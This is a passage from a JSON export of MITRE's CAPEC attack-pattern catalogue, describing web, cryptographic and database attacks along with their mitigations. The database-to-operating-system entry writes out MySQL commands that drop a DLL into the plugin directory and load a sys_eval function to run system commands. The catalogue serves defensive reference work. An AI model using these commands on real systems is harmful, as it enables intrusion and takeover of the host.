SHA1, etc.). That hash then forms the signature that is passed to the web service which is used on the server side to verify the origin authenticity and integrity of the message. There is a practical attack against an authentication scheme of this nature that makes use of the hash function extension / padding weakness. Leveraging this weakness, an attacker, who does not know the secret token, is able to modify the parameters passed to the web service by generating their own call and still generate a legitimate signature hash (as described in the notes). Because of the iterative design of the hash function, it is possible, from only the hash of a message and its length, to compute the hash of longer messages that start with the initial message and include the padding required for the initial message to reach a multiple of 512 bits. It is important to note that the attack not limited to MD5 and will work on other hash functions such as SHA1.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"115"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Find a vulnerable web service] The adversary finds a web service that uses a vulnerable authentication scheme, where an authentication token is concatenated with the parameters of a request and then hashed","Technique":["Read application documentation to learn about authentication schemes being used","Observe web service traffic to look for vulnerable authentication schemes"]},{"Step":"2","Phase":"Experiment","Description":"[Attempt adding padding to parameters] An adversary tests if they can simply add padding to the parameters of a request such that the request is technically changed, with the hash remaining the same","Technique":"Exploit the hash function extension / padding weakness with only padding to test the weakness"},{"Step":"3","Phase":"Exploit","Description":"[Add malicious parameters to request] Add malicious parameters to a captured request in addition to what is already present. Do this by exploiting the padding weakness of the hash function and send the request to the web service so that it believes it is authenticated and acts on the extra parameters.","Technique":"Exploit the hash function extension / padding weakness by adding malicious parameters to a web service request such that it is still deemed authentic"}]},"Prerequisites":{"Prerequisite":["Web services check the signature of the API calls","Authentication tokens / secrets are shared between the server and the legitimate client","The API call signature is generated by concatenating the parameter list with the shared secret and hashing the result.","An iterative hash function like MD5 and SHA1 is used.","An attacker is able to intercept or in some other way gain access to the information passed between the legitimate client and the server in order to retrieve the hash value and length of the original message.","The communication channel between the client and the server is not secured via channel security such as TLS"]},"Skills_Required":{"Skill":["Medium level of cryptography knowledge, specifically how iterative hash functions work. This is needed to select proper padding.",{"Level":"Medium"}]},"Resources_Required":{"Resource":{"p":["Access to a function to produce a hash (e.g., MD5, SHA1)","Tools that allow the attacker to intercept a message between the client and the server, specifically the hash that is the signature and the length of the original message concatenated with the secret bytes"]}},"Mitigations":{"Mitigation":"Design: Use a secure message authentication code (MAC) function such as an HMAC-SHA1"},"Example_Instances":{"Example":"To leverage an attack against the has function extension / padding weakness, consider the message to be passed to the web service is M (this message includes the parameters passed to the web service concatenated with the secret token / key bytes). The message M is hashed and that hash is passed to the web service and is used for authentication. The attacker does not know M, but can see Hash (M) and Length (M). The attacker can then compute Hash (M || Padding (M) || M\') for any M\'. The attacker does not know the entire message M, specifically the attacker does not know the secret bytes, but that does not matter. The attacker is still able to sign their own message M\' and make the called web service verify the integrity of the message without an error."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"328"},{"CWE_ID":"290"}]},"References":{"Reference":{"External_Reference_ID":"REF-398"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated Attack_Prerequisites, Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Example_Instances"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"462":{"ID":"462","Name":"Cross-Domain Search Timing","Abstraction":"Detailed","Status":"Draft","Description":"An attacker initiates cross domain HTTP / GET requests and times the server responses. The timing of these responses may leak important information on what is happening on the server. Browser\'s same origin policy prevents the attacker from directly reading the server responses (in the absence of any other weaknesses), but does not prevent the attacker from timing the responses to requests that the attacker issued cross domain. For GET requests an attacker could for instance leverage the \\"img\\" tag in conjunction with \\"onload() / onerror()\\" javascript events. For the POST requests, an attacker could leverage the \\"iframe\\" element and leverage the \\"onload()\\" event. There is nothing in the current browser security model that prevents an attacker to use these methods to time responses to the attackers\' cross domain requests. The timing for these responses leaks information. For instance, if a victim has an active session with their online e-mail account, an attacker could issue search requests in the victim\'s mailbox. While the attacker is not able to view the responses, based on the timings of the responses, the attacker could ask yes / no questions as to the content of victim\'s e-mails, who the victim e-mailed, when, etc. This is but one example; There are other scenarios where an attacker could infer potentially sensitive information from cross domain requests by timing the responses while asking the right questions that leak information.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"54"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Determine service to send cross domain requests to] The adversary first determines which service they will be sending the requests to"},{"Step":"2","Phase":"Experiment","Description":"[Send and time various cross domain requests] Adversaries will send a variety of cross domain requests to the target, timing the time it takes for the target to respond. Although they won\'t be able to read the response, the adversary can use the time to infer information about what the service did upon receiving the request.","Technique":["Using a GET request, leverage the \\"img\\" tag in conjunction with \\"onload() / onerror()\\" javascript events to time a response","Using a POST request, leverage the \\"iframe\\" element and use the \\"onload()\\" event to time a response"]},{"Step":"3","Phase":"Exploit","Description":"[Infer information from the response time] After obtaining reponse times to various requests, the adversary will compare these times and infer potentially sensitive information. An example of this could be asking a service to retrieve information and random usernames. If one request took longer to process, it is likely that a user with that username exists, which could be useful knowledge to an adversary.","Technique":"Compare timing of different requests to infer potentially sensitive information about a target service"}]},"Prerequisites":{"Prerequisite":"Ability to issue GET / POST requests cross domainJava Script is enabled in the victim\'s browserThe victim has an active session with the site from which the attacker would like to receive informationThe victim\'s site does not protect search functionality with cross site request forgery (CSRF) protection"},"Skills_Required":{"Skill":["Some knowledge of Java Script",{"Level":"Low"}]},"Resources_Required":{"Resource":"Ability to issue GET / POST requests cross domain"},"Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Data"}},"Mitigations":{"Mitigation":["Design: The victim\'s site could protect all potentially sensitive functionality (e.g. search functions) with cross site request forgery (CSRF) protection and not perform any work on behalf of forged requests","Design: The browser\'s security model could be fixed to not leak timing information for cross domain requests"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"385"},{"CWE_ID":"352"},{"CWE_ID":"208"}]},"References":{"Reference":{"External_Reference_ID":"REF-399"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-01-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Consequences"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-10-21","Modification_Comment":"Updated Execution_Flow"}]}},"463":{"ID":"463","Name":"Padding Oracle Crypto Attack","Abstraction":"Detailed","Status":"Draft","Description":"An adversary is able to efficiently decrypt data without knowing the decryption key if a target system leaks data on whether or not a padding error happened while decrypting the ciphertext. A target system that leaks this type of information becomes the padding oracle and an adversary is able to make use of that oracle to efficiently decrypt data without knowing the decryption key by issuing on average 128*b calls to the padding oracle (where b is the number of bytes in the ciphertext block). In addition to performing decryption, an adversary is also able to produce valid ciphertexts (i.e., perform encryption) by using the padding oracle, all without knowing the encryption key. Any cryptosystem can be vulnerable to padding oracle attacks if the encrypted messages are not authenticated to ensure their validity prior to decryption, and then the information about padding error is leaked to the adversary. This attack technique may be used, for instance, to break CAPTCHA systems or decrypt/modify state information stored in client side objects (e.g., hidden fields or cookies). This attack technique is a side-channel attack on the cryptosystem that uses a data leak from an improperly implemented decryption routine to completely subvert the cryptosystem. The one bit of information that tells the adversary whether a padding error during decryption has occurred, in whatever form it comes, is sufficient for the adversary to break the cryptosystem. That bit of information can come in a form of an explicit error message about a padding error, a returned blank page, or even the server taking longer to respond (a timing attack). This attack can be launched cross domain where an adversary is able to use cross-domain information leaks to get the bits of information from the padding oracle from a target system / service with which the victim is communicating.","Typical_Severity":"High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"97","Exclude_Related":{"Exclude_ID":"515"}}},"Prerequisites":{"Prerequisite":["The decryption routine does not properly authenticate the message / does not verify its integrity prior to performing the decryption operation","The target system leaks data (in some way) on whether a padding error has occurred when attempting to decrypt the ciphertext.","The padding oracle remains available for enough time / for as many requests as needed for the adversary to decrypt the ciphertext."]},"Resources_Required":{"Resource":{"p":["Ability to detect instances where a target system is vulnerable to an oracle padding attack","Sufficient cryptography knowledge and tools needed to take advantage of the presence of the padding oracle to perform decryption / encryption of data without a key"]}},"Mitigations":{"Mitigation":["Design: Use a message authentication code (MAC) or another mechanism to perform verification of message authenticity / integrity prior to decryption","Implementation: Do not leak information back to the user as to any cryptography (e.g., padding) encountered during decryption."]},"Example_Instances":{"Example":"An adversary sends a request containing ciphertext to the target system. Due to the browser\'s same origin policy, the adversary is not able to see the response directly, but can use cross-domain information leak techniques to still get the information needed (i.e., information on whether or not a padding error has occurred). This can be done using \\"img\\" tag plus the onerror()/onload() events. The adversary\'s JavaScript can make web browsers to load an image on the target site, and know if the image is loaded or not. This is 1-bit information needed for the padding oracle attack to work: if the image is loaded, then it is valid padding, otherwise it is not."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"209"},{"CWE_ID":"514"},{"CWE_ID":"649"},{"CWE_ID":"347"},{"CWE_ID":"354"},{"CWE_ID":"696"}]},"References":{"Reference":{"External_Reference_ID":"REF-400"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2017-08-04","Modification_Comment":"Updated Attack_Prerequisites, Description Summary"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2018-07-31","Modification_Comment":"Updated References"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Example_Instances, Mitigations"}]}},"464":{"ID":"464","Name":"Evercookie","Abstraction":"Standard","Status":"Draft","Description":"An attacker creates a very persistent cookie that stays present even after the user thinks it has been removed. The cookie is stored on the victim\'s machine in over ten places to include: Standard HTTP Cookies, Local Shared Objects (Flash Cookies), Silverlight Isolated Storage, Storing cookies in RGB values of auto-generated, force-cached, PNGs using HTML5 Canvas tag to read pixels (cookies) back out, Storing cookies in Web History, Storing cookies in HTTP ETags, Storing cookies in Web cache, window.name caching, Internet Explorer userData storage, HTML5 Session Storage, HTML5 Local Storage, HTML5 Global Storage, HTML5 Database Storage via SQLite, among others. When the victim clears the cookie cache via traditional means inside the browser, that operation removes the cookie from certain places but not others. The malicious code then replicates the cookie from all of the places where it was not deleted to all of the possible storage locations once again. So the victim again has the cookie in all of the original storage locations. In other words, failure to delete the cookie in even one location will result in the cookie\'s resurrection everywhere. The evercookie will also persist across different browsers because certain stores (e.g., Local Shared Objects) are shared between different browsers.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"554"}},"Prerequisites":{"Prerequisite":"The victim\'s browser is not configured to reject all cookiesThe victim visits a website that serves the attackers\' evercookie"},"Resources_Required":{"Resource":"Evercookie source code"},"Mitigations":{"Mitigation":["Design: Browser\'s design needs to be changed to limit where cookies can be stored on the client side and provide an option to clear these cookies in all places, as well as another option to stop these cookies from being written in the first place.","Design: Safari browser\'s private browsing mode is currently effective against evercookies."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"359"}},"References":{"Reference":{"External_Reference_ID":"REF-401"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Description Summary, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations"}]}},"465":{"ID":"465","Name":"Transparent Proxy Abuse","Abstraction":"Standard","Status":"Draft","Description":"A transparent proxy serves as an intermediate between the client and the internet at large. It intercepts all requests originating from the client and forwards them to the correct location. The proxy also intercepts all responses to the client and forwards these to the client. All of this is done in a manner transparent to the client. Transparent proxies are often used by enterprises and ISPs. For requests originating at the client transparent proxies need to figure out the final destination of the client\'s data packet. Two ways are available to do that: either by looking at the layer three (network) IP address or by examining layer seven (application) HTTP header destination. A browser has same origin policy that typically prevents scripts coming from one domain initiating requests to other websites from which they did not come. To circumvent that, however, malicious Flash or an Applet that is executing in the user\'s browser can attempt to create a cross-domain socket connection from the client to the remote domain. The transparent proxy will examine the HTTP header of the request and direct it to the remote site thereby partially bypassing the browser\'s same origin policy. This can happen if the transparent proxy uses the HTTP host header information for addressing rather than the IP address information at the network layer. This attack allows malicious scripts inside the victim\'s browser to issue cross-domain requests to any hosts accessible to the transparent proxy.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"554"}},"Prerequisites":{"Prerequisite":"Transparent proxy is usedVulnerable configuration of network topology involving the transparent proxy (e.g., no NAT happening between the client and the proxy)Execution of malicious Flash or Applet in the victim\'s browser"},"Skills_Required":{"Skill":["Creating malicious Flash or Applet to open a cross-domain socket connection to a remote system",{"Level":"Medium"}]},"Mitigations":{"Mitigation":["Design: Ensure that the transparent proxy uses an actual network layer IP address for routing requests. On the transparent proxy, disable the use of routing based on address information in the HTTP host header.","Configuration: Disable in the browser the execution of Java Script, Flash, SilverLight, etc."]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"441"}},"References":{"Reference":{"External_Reference_ID":"REF-402"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations"}],"Previous_Entry_Name":["Socket Capable Browser Plugins Result In Transparent Proxy Abuse",{"Date":"2015-12-07"}]}},"466":{"ID":"466","Name":"Leveraging Active Adversary in the Middle Attacks to Bypass Same Origin Policy","Abstraction":"Standard","Status":"Draft","Description":"An attacker leverages an adversary in the middle attack (CAPEC-94) in order to bypass the same origin policy protection in the victim\'s browser. This active adversary in the middle attack could be launched, for instance, when the victim is connected to a public WIFI hot spot. An attacker is able to intercept requests and responses between the victim\'s browser and some non-sensitive website that does not use TLS. When an attacker intercepts a response bound to the victim, an attacker adds an iFrame (which is possibly invisible) to the response referencing some domain with sensitive functionality and forwards the response to the victim. The victim\'s browser than automatically initiates an unauthorized request to the site with sensitive functionality. The same origin policy would prevent making these requests to a site other than the one from which the Java Script came, but the attacker once again uses active adversary in the middle to intercept these automatic requests and redirect them to the domain / service with sensitive functionality. Any persistent cookies that the victim has in their browser would be used for these unauthorized requests. The attacker thus actively directs the victim to a site with sensitive functionality. When the site with sensitive functionality responds back to the victim\'s request, an active adversary in the middle attacker intercepts these responses, injects their own malicious Java Script into these responses, and forwards to the victim\'s browser. In the victim\'s browser, that Java Script executes under the restrictions of the site with sensitive functionality and can be used to continue to interact with the sensitive site. So an attacker can execute scripts within the victim\'s browser on any domains the attacker desires. The attacker is able to use this technique to steal cookies from the victim\'s browser for whatever site the attacker wants. This applies to both persistent cookies and HTTP only cookies (unlike traditional XSS attacks). An attacker is also able to use this technique to steal authentication credentials for sites that only encrypt the login form, but do not require a secure channel for the initial request to get to the page with the login form. Further the attacker is also able to steal any autocompletion information. This attack pattern can also be used to enable session fixation and cache poisoning attacks. Additional attacks can be enabled as well.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"94"}},"Prerequisites":{"Prerequisite":"The victim and the attacker are both in an environment where an active adversary in the middle attack is possible (e.g., public WIFI hot spot)The victim visits at least one website that does not use TLS / SSL"},"Skills_Required":{"Skill":["Ability to intercept and modify requests / responses",{"Level":"Low"},"Ability to create iFrame and JavaScript code that would initiate unauthorized requests to sensitive sites from the victim\'s browser",{"Level":"Medium"},"Solid understanding of the HTTP protocol",{"Level":"Medium"}]},"Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Data"},{"Scope":"Authorization","Impact":"Execute Unauthorized Commands"}]},"Mitigations":{"Mitigation":["Design: Tunnel communications through a secure proxy","Design: Trust level separation for privileged / non privileged interactions (e.g., two different browsers, two different users, two different operating systems, two different virtual machines)"]},"Related_Weaknesses":{"Related_Weakness":{"CWE_ID":"300"}},"References":{"Reference":{"External_Reference_ID":"REF-403"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2019-09-30","Modification_Comment":"Updated @Abstraction"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Consequences, Description, Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated @Name, Description, Prerequisites"}],"Previous_Entry_Name":["Leveraging Active Man in the Middle Attacks to Bypass Same Origin Policy",{"Date":"2021-06-24"}]}},"467":{"ID":"467","Name":"Cross Site Identification","Abstraction":"Detailed","Status":"Draft","Description":"An attacker harvests identifying information about a victim via an active session that the victim\'s browser has with a social networking site. A victim may have the social networking site open in one tab or perhaps is simply using the \\"remember me\\" feature to keep their session with the social networking site active. An attacker induces a payload to execute in the victim\'s browser that transparently to the victim initiates a request to the social networking site (e.g., via available social network site APIs) to retrieve identifying information about a victim. While some of this information may be public, the attacker is able to harvest this information in context and may use it for further attacks on the user (e.g., spear phishing). There are many other ways in which the attacker may get the payload to execute in the victim\'s browser mainly by finding a way to hide it in some reputable site that the victim visits. The attacker could also send the link to the victim in an e-mail and trick the victim into clicking on the link. This attack is basically a cross site request forgery attack with two main differences. First, there is no action that is performed on behalf of the user aside from harvesting information. So standard CSRF protection may not work in this situation. Second, what is important in this attack pattern is the nature of the data being harvested, which is identifying information that can be obtained and used in context. This real time harvesting of identifying information can be used as a prelude for launching real time targeted social engineering attacks on the victim.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"62"}},"Prerequisites":{"Prerequisite":"The victim has an active session with the social networking site."},"Skills_Required":{"Skill":["An attacker should be able to create a payload and deliver it to the victim\'s browser.",{"Level":"High"},"An attacker needs to know how to interact with various social networking sites (e.g., via available APIs) to request information and how to send the harvested data back to the attacker.",{"Level":"Medium"}]},"Mitigations":{"Mitigation":["Usage: Users should always explicitly log out from the social networking sites when done using them.","Usage: Users should not open other tabs in the browser when using a social networking site."]},"Example_Instances":{"Example":"An attacker may post a malicious posting that contains an image with an embedded link. The link actually requests identifying information from the social networking site. A victim who views the malicious posting in their browser will have sent identifying information to the attacker, as long as the victim had an active session with the social networking site."},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"352"},{"CWE_ID":"359"}]},"References":{"Reference":{"External_Reference_ID":"REF-404"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Description, Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Description, Example_Instances, Mitigations"}]}},"468":{"ID":"468","Name":"Generic Cross-Browser Cross-Domain Theft","Abstraction":"Standard","Status":"Draft","Description":"An attacker makes use of Cascading Style Sheets (CSS) injection to steal data cross domain from the victim\'s browser. The attack works by abusing the standards relating to loading of CSS: 1. Send cookies on any load of CSS (including cross-domain) 2. When parsing returned CSS ignore all data that does not make sense before a valid CSS descriptor is found by the CSS parser By having control of some text in the victim\'s domain, the attacker is able to inject a seemingly valid CSS string. It does not matter if this CSS string is preceded by other data. The CSS parser will still locate the CSS string. If the attacker is able to control two injection points, one before the cross domain data that the attacker is interested in receiving and the other one after, the attacker can use this attack to steal all of the data in between these two CSS injection points when referencing the injected CSS while performing rendering on the site that the attacker controls. When rendering, the CSS parser will detect the valid CSS string to parse and ignore the data that \\"does not make sense\\". That data will simply be rendered. That data is in fact the data that the attacker just stole cross domain. The stolen data may contain sensitive information, such CSRF protection tokens.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"242"}},"Prerequisites":{"Prerequisite":"No new lines can be present in the injected CSS stringProper HTML or URL escaping of the \\" and \' characters is not presentThe attacker has control of two injection points: pre-string and post-string"},"Skills_Required":{"Skill":["Ability to craft a CSS injection",{"Level":"High"}]},"Resources_Required":{"Resource":"Attacker controlled site/page to render a page referencing the injected CSS string"},"Mitigations":{"Mitigation":["Design: Prior to performing CSS parsing, require the CSS to start with well-formed CSS when it is a cross-domain load and the MIME type is broken. This is a browser level fix.","Implementation: Perform proper HTML encoding and URL escaping"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"707"},{"CWE_ID":"149"},{"CWE_ID":"177"},{"CWE_ID":"838"}]},"References":{"Reference":{"External_Reference_ID":"REF-405"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-11-09","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2015-12-07","Modification_Comment":"Updated Related_Attack_Patterns"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations"}]}},"469":{"ID":"469","Name":"HTTP DoS","Abstraction":"Standard","Status":"Draft","Description":"An attacker performs flooding at the HTTP level to bring down only a particular web application rather than anything listening on a TCP/IP connection. This denial of service attack requires substantially fewer packets to be sent which makes DoS harder to detect. This is an equivalent of SYN flood in HTTP. The idea is to keep the HTTP session alive indefinitely and then repeat that hundreds of times. This attack targets resource depletion weaknesses in web server software. The web server will wait to attacker\'s responses on the initiated HTTP sessions while the connection threads are being exhausted.","Typical_Severity":"Low","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"227"}},"Prerequisites":{"Prerequisite":"HTTP protocol is usedWeb server used is vulnerable to denial of service via HTTP flooding"},"Resources_Required":{"Resource":"Ability to issues hundreds of HTTP requests"},"Mitigations":{"Mitigation":["Configuration: Configure web server software to limit the waiting period on opened HTTP sessions","Design: Use load balancing mechanisms"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"770"},{"CWE_ID":"772"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"Taxonomy_Name":"ATTACK","Entry_ID":"1499.001","Entry_Name":"Endpoint Denial of Service:OS Exhaustion Flood"}},"References":{"Reference":{"External_Reference_ID":"REF-406"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":[{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-07-30","Modification_Comment":"Updated Taxonomy_Mappings"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Mitigations"},{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2021-06-24","Modification_Comment":"Updated Taxonomy_Mappings"}]}},"470":{"ID":"470","Name":"Expanding Control over the Operating System from the Database","Abstraction":"Detailed","Status":"Draft","Description":"An attacker is able to leverage access gained to the database to read / write data to the file system, compromise the operating system, create a tunnel for accessing the host machine, and use this access to potentially attack other machines on the same network as the database machine. Traditionally SQL injections attacks are viewed as a way to gain unauthorized read access to the data stored in the database, modify the data in the database, delete the data, etc. However, almost every data base management system (DBMS) system includes facilities that if compromised allow an attacker complete access to the file system, operating system, and full access to the host running the database. The attacker can then use this privileged access to launch subsequent attacks. These facilities include dropping into a command shell, creating user defined functions that can call system level libraries present on the host machine, stored procedures, etc.","Typical_Severity":"Very High","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"66"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"The adversary identifies a database management system running on a machine they would like to gain control over, or on a network they want to move laterally through."},{"Step":"2","Phase":"Experiment","Description":"The adversary goes about the typical steps of an SQL injection and determines if an injection is possible."},{"Step":"3","Phase":"Experiment","Description":"Once the Adversary determines that an SQL injection is possible, they must ensure that the requirements for the attack are met. These are a high privileged session user and batched query support. This is done in similar ways to discovering if an SQL injection is possible."},{"Step":"4","Phase":"Experiment","Description":"If the requirements are met, based on the database management system that is running, the adversary will find or create user defined functions (UDFs) that can be loaded as DLLs. An example of a DLL can be found at https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/mysql"},{"Step":"5","Phase":"Experiment","Description":"In order to load the DLL, the adversary must first find the path to the plugin directory. The command to achieve this is different based on the type of DBMS, but for MySQL, this can be achieved by running the command \\"select @@plugin_dir\\""},{"Step":"6","Phase":"Exploit","Description":"The DLL is then moved into the previously found plugin directory so that the contained functions can be loaded. This can be done in a number of ways; loading from a network share, writing the entire hex encoded string to a file in the plugin directory, or loading the DLL into a table and then into a file. An example using MySQL to load the hex string is as follows. select 0x4d5a9000... into dump file \\"{plugin directory}\\\\\\\\udf.dll\\";"},{"Step":"6","Phase":"Exploit","Description":"Once the DLL is in the plugin directory, a command is then run to load the UDFs. An example of this in MySQL is \\"create function sys_eval returns string soname \'udf.dll\';\\" The function sys_eval is specific to the example DLL listed above."},{"Step":"6","Phase":"Exploit","Description":"Once the adversary has loaded the desired function(s), they will use these to execute arbitrary commands on the compromised system. This is done through a simple select command to the loaded UDF. For example: \\"select sys_eval(\'dir\');\\". Because the prerequisite to this attack is that the database session user is a super user, this means that the adversary will be able to execute commands with elevated privileges."}]},"Prerequisites":{"Prerequisite":"A vulnerable DBMS is usedA SQL injection exists that gives an attacker access to the database or an attacker has access to the DBMS via other means"},"Skills_Required":{"Skill":["Low level knowledge of the various facilities available in different DBMS systems for interacting with the file system and operating system",{"Level":"High"}]},"Mitigations":{"Mitigation":["Design: Follow the defensive programming practices needed to protect an application accessing the database from SQL injection","Configuration: Ensure that the DBMS is patched with the latest security patches","Design: Ensure that the DBMS login used by the application has the lowest possible level of privileges in the DBMS","Design: Ensure that DBMS runs with the lowest possible level of privileges on the host machine and that it runs as a separate user","Usage: Do not use the DBMS machine for anything else other than the database","Usage: Do not place any trust in the database host on the internal network. Authenticate and validate all network activity originating from the database host.","Usage: Use an intrusion detection system to monitor network connections and logs on the database host.","Implementation: Remove / disable all unneeded / unused functions of the DBMS system that may allow an attacker to elevate privileges if compromised"]},"Related_Weaknesses":{"Related_Weakness":[{"CWE_ID":"250"},{"CWE_ID":"89"}]},"References":{"Reference":{"External_Reference_ID":"REF-408"}},"Content_History":{"Submission":{"Submission_Name":"CAPEC Content Team","Submission_Organization":"The MITRE Corporation","Submission_Date":"2014-06-23"},"Modification":{"Modification_Name":"CAPEC Content Team","Modification_Organization":"The MITRE Corporation","Modification_Date":"2020-12-17","Modification_Comment":"Updated Execution_Flow, Mitigations"}}},"471":{"ID":"471","Name":"Search Order Hijacking","Abstraction":"Detailed","Status":"Stable","Description":"An adversary exploits a weakness in an application\'s specification of external libraries to exploit the functionality of the loader where the process loading the library searches first in the same directory in which the process binary resides and then in other directories. Exploitation of this preferential search order can allow an attacker to make the loading process load the adversary\'s rogue library rather than the legitimate library. This attack can be leveraged with many different libraries and with many different loading processes. No forensic trails are left in the system\'s registry or file system that an incorrect library had been loaded.","Typical_Severity":"Medium","Related_Attack_Patterns":{"Related_Attack_Pattern":{"Nature":"ChildOf","CAPEC_ID":"159"}},"Execution_Flow":{"Attack_Step":[{"Step":"1","Phase":"Explore","Description":"[Identify target general susceptibility] An attacker uses an automated tool or manually finds whether the target application uses dynamically linked libraries and the configuration file 